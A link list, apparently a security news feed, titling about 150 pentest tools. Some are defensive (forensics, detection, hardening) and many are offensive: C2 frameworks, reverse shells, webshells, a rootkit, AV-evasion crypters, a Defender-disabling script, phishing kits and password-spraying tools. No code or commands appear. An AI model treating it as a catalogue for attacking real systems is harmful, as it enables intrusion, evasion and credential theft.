- [HashCheck - Tool To Assist In The Search For Leaked Passwords](http://feedproxy.google.com/~r/PentestTools/~3/IKIzL1W4yTE/hashcheck-tool-to-assist-in-search-for.html)
- [Swift-Attack - Unit Tests For Blue Teams To Aid With Building Detections For Some Common macOS Post Exploitation Methods](http://feedproxy.google.com/~r/PentestTools/~3/xokPMO3_qi8/swift-attack-unit-tests-for-blue-teams.html)
- [Squalr - Squalr Memory Editor - Game Hacking Tool Written In C#](http://feedproxy.google.com/~r/PentestTools/~3/fYMboqEG5pk/squalr-squalr-memory-editor-game.html)
- [RdpCacheStitcher - RdpCacheStitcher Is A Tool That Supports Forensic Analysts In Reconstructing Useful Images Out Of RDP Cache Bitmaps](http://feedproxy.google.com/~r/PentestTools/~3/7piT9WDswA4/rdpcachestitcher-rdpcachestitcher-is.html)
- [NamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation](http://feedproxy.google.com/~r/PentestTools/~3/-HZHrQtMTU0/namedpipepth-pass-hash-to-named-pipe.html)
- [Ioccheck - A Tool For Simplifying The Process Of Researching IOCs](http://feedproxy.google.com/~r/PentestTools/~3/0M0vf3GU57M/ioccheck-tool-for-simplifying-process.html)
- [FalconEye - Real-time detection software for Windows process injections](http://feedproxy.google.com/~r/PentestTools/~3/5RtOAGxRL2E/falconeye-real-time-detection-software.html)
- [Rustcat - Netcat Alternative](http://feedproxy.google.com/~r/PentestTools/~3/h1GxA_AToyI/rustcat-netcat-alternative.html)
- [Kconfig-Hardened-Check - A Tool For Checking The Hardening Options In The Linux Kernel Config](http://feedproxy.google.com/~r/PentestTools/~3/Vfx_KNX10T4/kconfig-hardened-check-tool-for.html)
- [Joern - Open-source Code Analysis Platform For C/C++/Java Based On Code Property Graphs](http://feedproxy.google.com/~r/PentestTools/~3/UBcN8P4hINM/joern-open-source-code-analysis.html)
- [PPLdump - Dump The Memory Of A PPL With A Userland Exploit](http://feedproxy.google.com/~r/PentestTools/~3/GBDT4OQGX6g/ppldump-dump-memory-of-ppl-with.html)
- [Volatility GUI - GUI For Volatility Forensics Tool](http://feedproxy.google.com/~r/PentestTools/~3/u39FWeRA3js/volatility-gui-gui-for-volatility.html)
- [Aggrokatz - An Aggressor Plugin Extension For Cobalt Strike Which Enables Pypykatz To Interface With The Beacons Remotely](http://feedproxy.google.com/~r/PentestTools/~3/PgYLryHwupI/aggrokatz-aggressor-plugin-extension.html)
- [Gundog - Guided Hunting In Microsoft 365 Defender](http://feedproxy.google.com/~r/PentestTools/~3/nrt-WwdJKGg/gundog-guided-hunting-in-microsoft-365.html)
- [TChopper - Conduct Lateral Movement Attack By Leveraging Unfiltered Services Display Name To Smuggle Binaries As Chunks Into The Target Machine](http://feedproxy.google.com/~r/PentestTools/~3/rx5ELj9dF4c/tchopper-conduct-lateral-movement.html)
- [A2P2V - Automated Attack Path Planning and Validation](http://feedproxy.google.com/~r/PentestTools/~3/YSVE2q5BJHQ/a2p2v-automated-attack-path-planning.html)
- [defenselessV1 - Just Another Vulnerable Web Application](http://feedproxy.google.com/~r/PentestTools/~3/0hI4x8p-kWY/defenselessv1-just-another-vulnerable.html)
- [Redpill - Assist Reverse Tcp Shells In Post-Exploration Tasks](http://feedproxy.google.com/~r/PentestTools/~3/PTe-CrQQjC8/redpill-assist-reverse-tcp-shells-in.html)
- [EmailFinder - Search Emails From A Domain Through Search Engines](http://feedproxy.google.com/~r/PentestTools/~3/V465UJRYNOc/emailfinder-search-emails-from-domain.html)
- [pyWhat - Identify Anything. Easily Lets You Identify Emails, IP Addresses, And More...](http://feedproxy.google.com/~r/PentestTools/~3/jOygJhiVqds/pywhat-identify-anything-easily-lets.html)
- [Nebula - Cloud C2 Framework, Which At The Moment Offers Reconnaissance, Enumeration, Exploitation, Post Exploitation On AWS](http://feedproxy.google.com/~r/PentestTools/~3/WkY0uqLUcZk/nebula-cloud-c2-framework-which-at.html)
- [iOS Malicious Bit Hunter - A Malicious Plug-In Detection Eng ine For iOS Applications](http://feedproxy.google.com/~r/PentestTools/~3/l1tPy6s_Yvo/ios-malicious-bit-hunter-malicious-plug.html)
- [Interactsh - An OOB Interaction Gathering Server And Client Library](http://feedproxy.google.com/~r/PentestTools/~3/0c4MvlAUnBU/interactsh-oob-interaction-gathering.html)
- [BlueCloud - Cyber Range including Velociraptor + HELK system with a Windows VM for security testing and R&D](http://feedproxy.google.com/~r/PentestTools/~3/B-0MM9YAVGU/bluecloud-cyber-range-including.html)
- [Neurax - A Framework For Constructing Self-Spreading Binaries](http://feedproxy.google.com/~r/PentestTools/~3/Z_cXGVx73Rs/neurax-framework-for-constructing-self.html)
- [Libinjection - SQL / SQLI Tokenizer Parser Analyzer](http://feedproxy.google.com/~r/PentestTools/~3/oGXouLWAS-4/libinjection-sql-sqli-tokenizer-parser.html)
- [SharpWebServer - HTTP And WebDAV Server With Net-NTLM Hashes Capture Functionality](http://feedproxy.google.com/~r/PentestTools/~3/a5ewQiEWS4w/sharpwebserver-http-and-webdav-server.html)
- [Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!](http://feedproxy.google.com/~r/PentestTools/~3/B13FlDeMvSQ/bbscope-scope-gathering-tool-for.html)
- [ColdFire - Golang Malware Development Library](http://feedproxy.google.com/~r/PentestTools/~3/_3-cxxQ1kis/coldfire-golang-malware-development.html)
- [Link - A Command And Control Framework Written In Rust](http://feedproxy.google.com/~r/PentestTools/~3/EX3MmH4FAow/link-command-and-control-framework.html)
- [Totp-Ssh-Fluxer - Take Security By Obscurity To The Next Level (This Is A Bad Idea, Don'T Really Use This Please)](http://feedproxy.google.com/~r/PentestTools/~3/6pEPXWNtKTQ/totp-ssh-fluxer-take-security-by.html)
- [RedWarden - Flexible CobaltStrike Malleable Redirector](http://feedproxy.google.com/~r/PentestTools/~3/Rvmf_IzkJ-s/redwarden-flexible-cobaltstrike.html)
- [Caronte - A Tool To Analyze The Network Flow During Attack/Defence Capture The Flag Competitions](http://feedproxy.google.com/~r/PentestTools/~3/nglFKZy7Jk8/caronte-tool-to-analyze-network-flow.html)
- [Krane - Kubernetes RBAC Static Analysis And Visualisation Tool](http://feedproxy.google.com/~r/PentestTools/~3/IVSO_bILyDg/krane-kubernetes-rbac-static-analysis.html)
- [Typodetect - Detect The Active Mutations Of Domains](http://feedproxy.google.com/~r/PentestTools/~3/MXGimzZAUWE/typodetect-detect-active-mutations-of.html)
- [Shepard - In Progress Persistent Download/Upload/Execution Tool Using Windows BITS](http://feedproxy.google.com/~r/PentestTools/~3/a0mfdvF--HU/shepard-in-progress-persistent.html)
- [ARTi-C2 - A Post-Exploitation Framework Used To Execute Atomic Red Team Test Cases With Rapid Payload Deployment And Execution Capabilities Via .NET's DLR](http://feedproxy.google.com/~r/PentestTools/~3/ggRqmB7raNY/arti-c2-post-exploitation-framework.html)
- [Metarget - Framework Providing Automatic Constructions Of Vulnerable Infrastructures](http://feedproxy.google.com/~r/PentestTools/~3/5U826nZIZIM/metarget-framework-providing-automatic.html)
- [Penglab - Abuse Of Google Colab For Cracking Hashes](http://feedproxy.google.com/~r/PentestTools/~3/0vjU4bnzga0/penglab-abuse-of-google-colab-for.html)
- [Bn-Uefi-Helper - Helper Plugin For Analyzing UEFI Firmware](http://feedproxy.google.com/~r/PentestTools/~3/H3dg10284_0/bn-uefi-helper-helper-plugin-for.html)
- [403Fuzzer - Fuzz 403/401Ing Endpoints For Bypasses](http://feedproxy.google.com/~r/PentestTools/~3/Ac5hGOY7bL8/403fuzzer-fuzz-403401ing-endpoints-for.html)
- [Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads](http://feedproxy.google.com/~r/PentestTools/~3/bk14iScGSkQ/onelinepy-python-obfuscator-to-generate.html)
- [Arkhota - A Web Brute Forcer For Android](http://feedproxy.google.com/~r/PentestTools/~3/m46SF2LteWU/arkhota-web-brute-forcer-for-android.html)
- [Dent - A Framework For Creating COM-based Bypasses Utilizing Vulnerabilities In Microsoft's WDAPT Sensors](http://feedproxy.google.com/~r/PentestTools/~3/P7ONXkvc3PM/dent-framework-for-creating-com-based.html)
- [magicRecon - A Powerful Shell Script To Maximize The Recon And Data Collection Process Of An Objective And Finding Common Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/s2l55YNQMYA/magicrecon-powerful-shell-script-to.html)
- [Bucky - An Automatic S3 Bucket Discovery Tool](http://feedproxy.google.com/~r/PentestTools/~3/tNdi51C9tqU/bucky-automatic-s3-bucket-discovery-tool.html)
- [Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite](http://feedproxy.google.com/~r/PentestTools/~3/RWyP4Cy-GOI/kaiju-binary-analysis-framework.html)
- [CheeseTools - Self-developed Tools For Lateral Movement/Code Execution](http://feedproxy.google.com/~r/PentestTools/~3/2l5kekQ1vMY/cheesetools-self-developed-tools-for.html)
- [IMAPLoginTester - Script That Reads A Text File With Lots Of E-Mails And Passwords, And Tries To Check If Those Credentials Are Valid By Trying To Login On IMAP Servers](http://feedproxy.google.com/~r/PentestTools/~3/CK52xMDm4T8/imaplogintester-script-that-reads-text.html)
- [slopShell - The Only Php Webshell You Need](http://feedproxy.google.com/~r/PentestTools/~3/3JZ7J9w5CII/slopshell-only-php-webshell-you-need.html)
- [HookDump - Security Product Hook Detection](http://feedproxy.google.com/~r/PentestTools/~3/mMA9feDtEnY/hookdump-security-product-hook-detection.html)
- [AnalyticsRelationships - Get Related Domains / Subdomains By Looking At Google Analytics IDs](http://feedproxy.google.com/~r/PentestTools/~3/LKp4V7BQC4I/analyticsrelationships-get-related.html)
- [Dystopia - Low To Medium Multithreaded Ubuntu Core Honeypot Coded In Python](http://feedproxy.google.com/~r/PentestTools/~3/TRYm2MaSaEc/dystopia-low-to-medium-multithreaded.html)
- [FireStorePwn - Firestore Database Vulnerability Scanner Using APKs](http://feedproxy.google.com/~r/PentestTools/~3/MBLBoxNY2DI/firestorepwn-firestore-database.html)
- [DNS-Black-Cat(DBC) - Multi Platform Toolkit For An Interactive DNS Shell Commands Exfiltration, By Using DNS-Cat You Will Be Able To Execute System Commands In Shell Mode Over DNS Protocol](http://feedproxy.google.com/~r/PentestTools/~3/Nk8a7irgNQI/dns-black-catdbc-multi-platform-toolkit.html)
- [Qvm-Create-Windows-Qube - Spin Up New Windows Qubes Quickly, Effortlessly And Securely](http://feedproxy.google.com/~r/PentestTools/~3/vxosqvICzbg/qvm-create-windows-qube-spin-up-new.html)
- [Php_Code_Analysis - San your PHP code for vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/WE3cldPIJFQ/phpcodeanalysis-san-your-php-code-for.html)
- [Solr-GRAB - Steal Apache Solr Instance Queries With Or Without A Username And Password](http://feedproxy.google.com/~r/PentestTools/~3/BS31nUP4BmE/solr-grab-steal-apache-solr-instance.html)
- [CiLocks - Android LockScreen Bypass](http://feedproxy.google.com/~r/PentestTools/~3/TwRx8lZsEI8/cilocks-android-lockscreen-bypass.html)
- [MurMurHash - Tool To Calculate A MurmurHash Value Of A Favicon To Hunt Phishing Websites On The Shodan Platform](http://feedproxy.google.com/~r/PentestTools/~3/NeGy7MPvWNE/murmurhash-tool-to-calculate-murmurhash.html)
- [AMSITrigger - The Hunt For Malicious Strings](http://feedproxy.google.com/~r/PentestTools/~3/c-giQMjqfRI/amsitrigger-hunt-for-malicious-strings.html)
- [SQLFluff - A SQL Linter And Auto-Formatter For Humans](http://feedproxy.google.com/~r/PentestTools/~3/Ia4DSQ4Dzx4/sqlfluff-sql-linter-and-auto-formatter.html)
- [Charlotte - C++ Fully Undetected Shellcode Launcher](http://feedproxy.google.com/~r/PentestTools/~3/g45HNHcVR58/charlotte-c-fully-undetected-shellcode.html)
- [GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes](http://feedproxy.google.com/~r/PentestTools/~3/rdzgbOUs2X0/graphqlmap-scripting-engine-to-interact.html)
- [DivideAndScan - Divide Full Port Scan Results And Use It For Targeted Nmap Runs](http://feedproxy.google.com/~r/PentestTools/~3/IGLSp5HA7vU/divideandscan-divide-full-port-scan.html)
- [AutoPentest-DRL - Automated Penetration Testing Using Deep Reinforcement Learning](http://feedproxy.google.com/~r/PentestTools/~3/7waGGiipBm8/autopentest-drl-automated-penetration.html)
- [ABPTTS - TCP Tunneling Over HTTP/HTTPS For Web Application Servers](http://feedproxy.google.com/~r/PentestTools/~3/g60ICJtKDtI/abptts-tcp-tunneling-over-httphttps-for.html)
- [Etherblob-Explorer - Search And Extract Blob Files On The Ethereum Blockchain Network](http://feedproxy.google.com/~r/PentestTools/~3/hUhBHVUnhtY/etherblob-explorer-search-and-extract.html)
- [IPED - Digital Forensic Tool - Process And Analyze Digital Evidence, Often Seized At Crime Scenes By Law Enforcement Or In A Corporate Investigation By Private Examiners](http://feedproxy.google.com/~r/PentestTools/~3/J-29ukqXrtQ/iped-digital-forensic-tool-process-and.html)
- [Ghidra-Evm - Module For Reverse Engineering Smart Contracts](http://feedproxy.google.com/~r/PentestTools/~3/j5aMUo3lXMY/ghidra-evm-module-for-reverse.html)
- [Msldap - LDAP Library For Auditing MS AD](http://feedproxy.google.com/~r/PentestTools/~3/uJ7e9rrybGM/msldap-ldap-library-for-auditing-ms-ad.html)
- [Mediator - An Extensible, End-To-End Encrypted Reverse Shell With A Novel Approach To Its Architecture](http://feedproxy.google.com/~r/PentestTools/~3/3zY-ZAEkQ9A/mediator-extensible-end-to-end.html)
- [Corsair_Scan - A Security Tool To Test Cross-Origin Resource Sharing (CORS)](http://feedproxy.google.com/~r/PentestTools/~3/xGYeKuaQPkM/corsairscan-security-tool-to-test-cross.html)
- [Eyeballer - Convolutional Neural Network For Analyzing Pentest Screenshots](http://feedproxy.google.com/~r/PentestTools/~3/YfV_XQdRv3U/eyeballer-convolutional-neural-network.html)
- [DFIR-O365RC - PowerShell Module For Office 365 And Azure AD Log Collection](http://feedproxy.google.com/~r/PentestTools/~3/MldcAlSn8Gg/dfir-o365rc-powershell-module-for.html)
- [Red-Kube - Red Team K8S Adversary Emulation Based On Kubectl](http://feedproxy.google.com/~r/PentestTools/~3/0gV1GcndTwo/red-kube-red-team-k8s-adversary.html)
- [CIMplant - C# Port Of WMImplant Which Uses Either CIM Or WMI To Query Remote Systems](http://feedproxy.google.com/~r/PentestTools/~3/hK_Q3SCh_Js/cimplant-c-port-of-wmimplant-which-uses.html)
- [Httpx - A Fast And Multi-Purpose HTTP Toolkit Allows To Run Multiple Probers Using Retryablehttp Library, It Is Designed To Maintain The Result Reliability With Increased Threads](http://feedproxy.google.com/~r/PentestTools/~3/Ldb5dOQbzIU/httpx-fast-and-multi-purpose-http.html)
- [Mubeng - An Incredibly Fast Proxy Checker And IP Rotator With Ease](http://feedproxy.google.com/~r/PentestTools/~3/qNepTtdfN9M/mubeng-incredibly-fast-proxy-checker.html)
- [R77-Rootkit - Fileless Ring 3 Rootkit With Installer And Persistence That Hides Processes, Files, Network Connections, Etc...](http://feedproxy.google.com/~r/PentestTools/~3/XITWW6DYsww/r77-rootkit-fileless-ring-3-rootkit.html)
- [3klCon - Automation Recon Tool Which Works With Large And Medium Scope](http://feedproxy.google.com/~r/PentestTools/~3/oiaISqnR2nk/3klcon-automation-recon-tool-which.html)
- [Snuffleupagus - Security Module For Php7 And Php8 - Killing Bugclasses And Virtual-Patching The Rest!](http://feedproxy.google.com/~r/PentestTools/~3/gFuQ4LBHg3s/snuffleupagus-security-module-for-php7.html)
- [ByeIntegrity-UAC - Bypass UAC By Hijacking A DLL Located In The Native Image Cache](http://feedproxy.google.com/~r/PentestTools/~3/5J02O_rmvvs/byeintegrity-uac-bypass-uac-by.html)
- [APSoft-Web-Scanner-v2 - Powerful Dork Searcher And Vulnerability Scanner For Windows Platform](http://feedproxy.google.com/~r/PentestTools/~3/cfBeM1Puyf0/apsoft-web-scanner-v2-powerful-dork.html)
- [Short story about Clubhouse user scraping and social graphs](http://feedproxy.google.com/~r/PentestTools/~3/-IEKai3bmnk/short-story-about-clubhouse-user.html)
- [VAST - Visibility Across Space And Time](http://feedproxy.google.com/~r/PentestTools/~3/fUIqckUTHck/vast-visibility-across-space-and-time.html)
- [Baserunner - A Tool For Exploring Firebase Datastores](http://feedproxy.google.com/~r/PentestTools/~3/jaZMZuVIBzY/baserunner-tool-for-exploring-firebase.html)
- [DNSObserver - A Handy DNS Service Written In Go To Aid In The Detection Of Several Types Of Blind Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/-7Xzdq8mQaw/dnsobserver-handy-dns-service-written.html)
- [CyberBattleSim - An Experimentation And Research Platform To Investigate The Interaction Of Automated Agents In An Abstract Simulated Network Environments](http://feedproxy.google.com/~r/PentestTools/~3/8VjKs69-NHA/cyberbattlesim-experimentation-and.html)
- [Lucifer - A Powerful Penetration Tool For Automating Penetration Tasks Such As Local Privilege Escalation, Enumeration, Exfiltration And More...](http://feedproxy.google.com/~r/PentestTools/~3/cEij7DJlAaA/lucifer-powerful-penetration-tool-for.html)
- [Waybackurls - Fetch All The URLs That The Wayback Machine Knows About For A Domain](http://feedproxy.google.com/~r/PentestTools/~3/hurfRuhKDBs/waybackurls-fetch-all-urls-that-wayback.html)
- [Kiterunner - Contextual Content Discovery Tool](http://feedproxy.google.com/~r/PentestTools/~3/lpZ1K9jBQSg/kiterunner-contextual-content-discovery.html)
- [Red-Detector - Scan Your EC2 Instance To Find Its Vulnerabilities Using Vuls.io](http://feedproxy.google.com/~r/PentestTools/~3/fqSeNVBcVis/red-detector-scan-your-ec2-instance-to.html)
- [WordPress-Brute-Force - Super Fast Login WordPress Brute Force](http://feedproxy.google.com/~r/PentestTools/~3/ScCJuqZ0HQg/wordpress-brute-force-super-fast-login.html)
- [CANalyse - A Vehicle Network Analysis And Attack Tool](http://feedproxy.google.com/~r/PentestTools/~3/UCIX_QJVv2U/canalyse-vehicle-network-analysis-and.html)
- [Judge-Jury-and-Executable - A File System Forensics Analysis Scanner And Threat Hunting Tool](http://feedproxy.google.com/~r/PentestTools/~3/ImNyrnuBNfU/judge-jury-and-executable-file-system.html)
- [Priv2Admin - Exploitation Paths Allowing You To (Mis)Use The Windows Privileges To Elevate Your Rights Within The OS](http://feedproxy.google.com/~r/PentestTools/~3/jURpTgdlk_8/priv2admin-exploitation-paths-allowing.html)
- [KubeArmor - Container-aware Runtime Security Enforcement System](http://feedproxy.google.com/~r/PentestTools/~3/Lzy94A4YpEQ/kubearmor-container-aware-runtime.html)
- [Botkube - An App That Helps You Monitor Your Kubernetes Cluster, Debug Critical Deployments And Gives Recommendations For Standard Practices](http://feedproxy.google.com/~r/PentestTools/~3/mwYT9LOSHdM/botkube-app-that-helps-you-monitor-your.html)
- [Botkube - An App That Helps You Monitor Your Kubernetes Cluster, Debug Critical Deployments &Amp; Gives Recommendations For Standard Practices](http://feedproxy.google.com/~r/PentestTools/~3/mwYT9LOSHdM/botkube-app-that-helps-you-monitor-your.html)
- [Pystinger - Bypass Firewall For Traffic Forwarding Using Webshell](http://feedproxy.google.com/~r/PentestTools/~3/pcXhp8s8hz0/pystinger-bypass-firewall-for-traffic.html)
- [LibAFL - Advanced Fuzzing Library - Slot Your Fuzzer Together In Rust! Scales Across Cores And Machines. For Windows, Android, MacOS, Linux, No_Std, ...](http://feedproxy.google.com/~r/PentestTools/~3/hgEsFokXJvA/libafl-advanced-fuzzing-library-slot.html)
- [Evasor - A Tool To Be Used In Post Exploitation Phase For Blue And Red Teams To Bypass APPLICATIONCONTROL Policies](http://feedproxy.google.com/~r/PentestTools/~3/CEBOr5pYdxg/evasor-tool-to-be-used-in-post.html)
- [Duplicut - Remove Duplicates From MASSIVE Wordlist, Without Sorting It (For Dictionary-Based Password Cracking)](http://feedproxy.google.com/~r/PentestTools/~3/QzDNqlQPjxE/duplicut-remove-duplicates-from-massive.html)
- [WinPmem - The Multi-Platform Memory Acquisition Tool](http://feedproxy.google.com/~r/PentestTools/~3/rzKTy8tqRPs/winpmem-multi-platform-memory.html)
- [Storm-Breaker - Tool Social Engineering (Access Webcam, Microphone, OS Password Grabber And Location Finder) With Ngrok](http://feedproxy.google.com/~r/PentestTools/~3/CT7tSwNuyNc/storm-breaker-tool-social-engineering.html)
- [Nginxpwner - Tool to look for common Nginx misconfigurations and vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/wiElk_BBEZ4/nginxpwner-tool-to-look-for-common.html)
- [Paragon - Red Team Engagement Platform With The Goal Of Unifying Offensive Tools Behind A Simple UI](http://feedproxy.google.com/~r/PentestTools/~3/iitZ4ZuCTZE/paragon-red-team-engagement-platform.html)
- [Vaf - Very Advanced (Web) Fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/1gT6rCzHXf4/vaf-very-advanced-web-fuzzer.html)
- [SniperPhish - The Web-Email Spear Phishing Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/5EqZRCDX6vA/sniperphish-web-email-spear-phishing.html)
- [MeterPwrShell - Automated Tool That Generate The Perfect Powershell Payload](http://feedproxy.google.com/~r/PentestTools/~3/7aGtjaBExz8/meterpwrshell-automated-tool-that.html)
- [M365_Groups_Enum - Enumerate Microsoft 365 Groups In A Tenant With Their Metadata](http://feedproxy.google.com/~r/PentestTools/~3/2Mw0vEcVTPg/m365groupsenum-enumerate-microsoft-365.html)
- [PwnLnX - An Advanced Multi-Threaded, Multi-Client Python Reverse Shell For Hacking Linux Systems](http://feedproxy.google.com/~r/PentestTools/~3/OsVHMIpYf6M/pwnlnx-advanced-multi-threaded-multi.html)
- [Invoke-Stealth - Simple And Powerful PowerShell Script Obfuscator](http://feedproxy.google.com/~r/PentestTools/~3/V3LtnShX1xg/invoke-stealth-simple-and-powerful.html)
- [Fav-Up - IP Lookup By Favicon Using Shodan](http://feedproxy.google.com/~r/PentestTools/~3/DP4zk-DCanA/fav-up-ip-lookup-by-favicon-using-shodan.html)
- [Ldsview - Offline search tool for LDAP directory dumps in LDIF format](http://feedproxy.google.com/~r/PentestTools/~3/mxq4Fm6-mv0/ldsview-offline-search-tool-for-ldap.html)
- [Cook - A Customizable Wordlist And Password Generator](http://feedproxy.google.com/~r/PentestTools/~3/tNnnJY9_hW4/cook-customizable-wordlist-and-password.html)
- [Profil3r - OSINT Tool That Allows You To Find A Person'S Accounts And Emails + Breached Emails](http://feedproxy.google.com/~r/PentestTools/~3/0wlEwXuP63I/profil3r-osint-tool-that-allows-you-to.html)
- [Tscopy - Tool to parse the NTFS $MFT file to locate and copy specific files](http://feedproxy.google.com/~r/PentestTools/~3/h23ju8Xa1iA/tscopy-tool-to-parse-ntfs-mft-file-to.html)
- [Posta - Cross-document Messaging Security Research Tool](http://feedproxy.google.com/~r/PentestTools/~3/r_bB4UNop_4/posta-cross-document-messaging-security.html)
- [OverRide - Binary Exploitation And Reverse-Engineering (From Assembly Into C)](http://feedproxy.google.com/~r/PentestTools/~3/5h3uJtvRjE4/override-binary-exploitation-and.html)
- [SlackPirate - Slack Enumeration And Extraction Tool - Extract Sensitive Information From A Slack Workspace](http://feedproxy.google.com/~r/PentestTools/~3/fVeK8fCDdSk/slackpirate-slack-enumeration-and.html)
- [IPCDump - Tool For Tracing Interprocess Communication (IPC) On Linux](http://feedproxy.google.com/~r/PentestTools/~3/4QR1SFFuL2o/ipcdump-tool-for-tracing-interprocess.html)
- [CrossLinked - LinkedIn Enumeration Tool To Extract Valid Employee Names From An Organization Through Search Engine Scraping](http://feedproxy.google.com/~r/PentestTools/~3/6wTf2bseEjk/crosslinked-linkedin-enumeration-tool.html)
- [Overlord - Red Teaming Infrastructure Automation](http://feedproxy.google.com/~r/PentestTools/~3/2cCXbpwU1x4/overlord-overlord-red-teaming.html)
- [Vulnerablecode - A Free And Open Vulnerabilities Database And The Packages They Impact And The Tools To Aggregate And Correlate These Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/oCFalqcMvYQ/vulnerablecode-free-and-open.html)
- [Kubesploit - A Cross-Platform Post-Exploitation HTTP/2 Command And Control Server And Agent Written In Golang](http://feedproxy.google.com/~r/PentestTools/~3/nN-c-yWgrVQ/kubesploit-cross-platform-post.html)
- [Dnspeep - Spy On The DNS Queries Your Computer Is Making](http://feedproxy.google.com/~r/PentestTools/~3/x2pzTCQawHw/dnspeep-spy-on-dns-queries-your.html)
- [Overlord - Overlord - Red Teaming Infrastructure Automation](http://feedproxy.google.com/~r/PentestTools/~3/2cCXbpwU1x4/overlord-overlord-red-teaming.html)
- [BetterXencrypt - A Better Version Of Xencrypt - Xencrypt It Self Is A Powershell Runtime Crypter Designed To Evade AVs](http://feedproxy.google.com/~r/PentestTools/~3/1zVtWlyQaeg/betterxencrypt-better-version-of.html)
- [Reproxy - Simple Edge Server / Reverse Proxy](http://feedproxy.google.com/~r/PentestTools/~3/VSBvAsDMT-Q/reproxy-simple-edge-server-reverse-proxy.html)
- [KubiScan - A Tool To Scan Kubernetes Cluster For Risky Permissions](http://feedproxy.google.com/~r/PentestTools/~3/b-mrz6dH6RY/kubiscan-tool-to-scan-kubernetes.html)
- [Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features](http://feedproxy.google.com/~r/PentestTools/~3/94EGEauTpaA/modded-ubuntu-run-ubuntu-gui-on-your.html)
- [Cypheroth - Automated, Extensible Toolset That Runs Cypher Queries Against Bloodhound's Neo4j Backend And Saves Output To Spreadsheets](http://feedproxy.google.com/~r/PentestTools/~3/vLFBaQrPjLM/cypheroth-automated-extensible-toolset.html)
- [Spraygen - Password List Generator For Password Spraying](http://feedproxy.google.com/~r/PentestTools/~3/bEP0fovngDg/spraygen-password-list-generator-for.html)
- [HttpDoom - A Tool For Response-Based Inspection Of Websites Across A Large Amount Of Hosts For Quickly Gaining An Overview Of HTTP-based Attack Surface](http://feedproxy.google.com/~r/PentestTools/~3/F0vswzS61g8/httpdoom-tool-for-response-based.html)
- [Sish - HTTP(S)/WS(S)/TCP Tunnels To Localhost Using Only SSH](http://feedproxy.google.com/~r/PentestTools/~3/RMbJvIy74tI/sish-httpswsstcp-tunnels-to-localhost.html)
- [Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN](http://feedproxy.google.com/~r/PentestTools/~3/s51KORysdVA/android-pin-bruteforce-unlock-android.html)
- [IRTriage - Incident Response Triage - Windows Evidence Collection For Forensic Analysis](http://feedproxy.google.com/~r/PentestTools/~3/L5g973Zdd2Q/irtriage-incident-response-triage.html)
- [PentestBro - Combines Subdomain Scans, Whois, Port Scanning, Banner Grabbing And Web Enumeration Into One Tool](http://feedproxy.google.com/~r/PentestTools/~3/wDudqcZ2-50/pentestbro-combines-subdomain-scans.html)
- [Defeat-Defender - Powerful Batch Script To Dismantle Complete Windows Defender Protection And Even Bypass Tamper Protection](http://feedproxy.google.com/~r/PentestTools/~3/rX6zBZvDdXE/defeat-defender-powerful-batch-script.html)
- [Swissknife - Scriptable VSCode Extension To Generate Or Manipulate Data. Stop Pasting Sensitive Data In Webpag](http://feedproxy.google.com/~r/PentestTools/~3/ZjD6htj4hPU/swissknife-scriptable-vscode-extension.html)
- [MoveKit - Cobalt Strike Kit For Lateral Movement](http://feedproxy.google.com/~r/PentestTools/~3/6bii0BfpNDg/movekit-cobalt-strike-kit-for-lateral.html)
- [Adfsbrute - A Script To Test Credentials Against Active Directory Federation Services (ADFS), Allowing Password Spraying Or Bruteforce Attacks](http://feedproxy.google.com/~r/PentestTools/~3/bZ9Q-5__tZ4/adfsbrute-script-to-test-credentials.html)
- [Traitor - Automatic Linux Privesc Via Exploitation Of Low-Hanging Fruit E.G. GTFOBin](http://feedproxy.google.com/~r/PentestTools/~3/j5TNnnNhdGc/traitor-automatic-linux-privesc-via.html)
- [Ronin - A Ruby Platform For Vulnerability Research And Exploit Development](http://feedproxy.google.com/~r/PentestTools/~3/t0ZKKs6gqaw/ronin-ruby-platform-for-vulnerability.html)
- [Dwn - D(Ockerp)Wn - A Docker Pwn Tool Manager](http://feedproxy.google.com/~r/PentestTools/~3/hMS5TzkoDTs/dwn-dockerpwn-docker-pwn-tool-manager.html)
- [SYNwall - A Zero-Configuration (IoT) Firewall](http://feedproxy.google.com/~r/PentestTools/~3/JIPxgCar4-Q/synwall-zero-configuration-iot-firewall.html)
- [Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool](http://feedproxy.google.com/~r/PentestTools/~3/Vb3Y9r6A4M0/cpufetch-simplistic-yet-fancy-cpu.html)
- [AzureC2Relay - An Azure Function That Validates And Relays Cobalt Strike Beacon Traffic By Verifying The Incoming Requests Based On A Cobalt Strike Malleable C2 Profile](http://feedproxy.google.com/~r/PentestTools/~3/gRQ_OdS7vQo/azurec2relay-azure-function-that.html)
- [Gotestwaf - Go Test WAF Is A Tool To Test Your WAF Detection Capabilities Against Different Types Of Attacks And By-Pass Techniques](http://feedproxy.google.com/~r/PentestTools/~3/eva_FfbEwac/gotestwaf-go-test-waf-is-tool-to-test.html)
- [SNOWCRASH - A Polyglot Payload Generator](http://feedproxy.google.com/~r/PentestTools/~3/_CWXvU8p5pk/snowcrash-polyglot-payload-generator.html)
- [PoisonApple - macOS Persistence Tool](http://feedproxy.google.com/~r/PentestTools/~3/-kTU31qAqdg/poisonapple-macos-persistence-tool.html)
- [Redcloud - Automated Red Team Infrastructure Deployement Using Docker](http://feedproxy.google.com/~r/PentestTools/~3/wK-wRmRIW3s/redcloud-automated-red-team.html)
- [Max - Maximizing BloodHound](http://feedproxy.google.com/~r/PentestTools/~3/73tTnhOBxIw/max-maximizing-bloodhound.html)
- [NtHiM - Super Fast Sub-domain Takeover Detection](http://feedproxy.google.com/~r/PentestTools/~3/g0sHRpFq1_8/nthim-super-fast-sub-domain-takeover.html)
